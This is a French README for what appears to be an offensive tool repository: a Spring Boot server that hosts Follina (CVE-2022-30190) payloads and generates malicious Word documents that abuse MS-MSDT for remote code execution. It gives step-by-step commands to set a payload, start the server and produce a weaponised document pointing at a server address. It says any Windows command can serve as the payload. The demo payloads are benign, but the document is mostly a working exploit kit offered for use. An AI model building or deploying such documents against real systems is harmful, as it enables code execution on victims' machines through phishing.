
Serveur pour héberger/activer des payloads Follina et générateur de documents Word malveillants exploitant le protocole MS-MSDT. (CVE-2022-30190)
Ce dépôt contient une simple application Spring Boot qui agit à la fois comme un serveur pour héberger/activer des charges utiles Follina, et comme un générateur de documents Word malveillants prêts à être utilisés comme vecteurs d'attaque pour exploiter CVE-2022-30190.
Cette vulnérabilité consiste en une exécution de code à distance via MSDT (Microsoft Windows Support Diagnostic Tool).
Pour servir une charge utile unique de votre choix, vous devez :
export FOLLINA_PAYLOAD="notepad.exe"
mvn spring-boot:run
curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc
Si vous souhaitez modifier la charge utile actuelle, vous devez d'abord arrêter le serveur actif, puis répéter les étapes après avoir défini la nouvelle charge utile.
REMARQUE : la charge utile peut être remplacée par n'importe quelle autre commande, à condition qu'elle puisse être exécutée via l'invite de commandes Windows.
Pour servir une charge utile côté client de votre choix, vous devez :
mvn spring-boot:run
cmd, par exemple :curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
Dans ce cas, la charge utile est intégrée dans le document, et aura simplement besoin d'être activée en contactant le serveur. De cette façon, vous pouvez avoir plusieurs charges utiles différentes réparties sur différents documents et vous n'aurez pas à redémarrer le serveur pour déclencher des modifications de charge utile - vous pouvez simplement générer un nouveau document avec la charge utile souhaitée intégrée.
Un grand merci à John Hammond pour avoir proposé l'implémentation Python, et partagé son analyse de la CVE.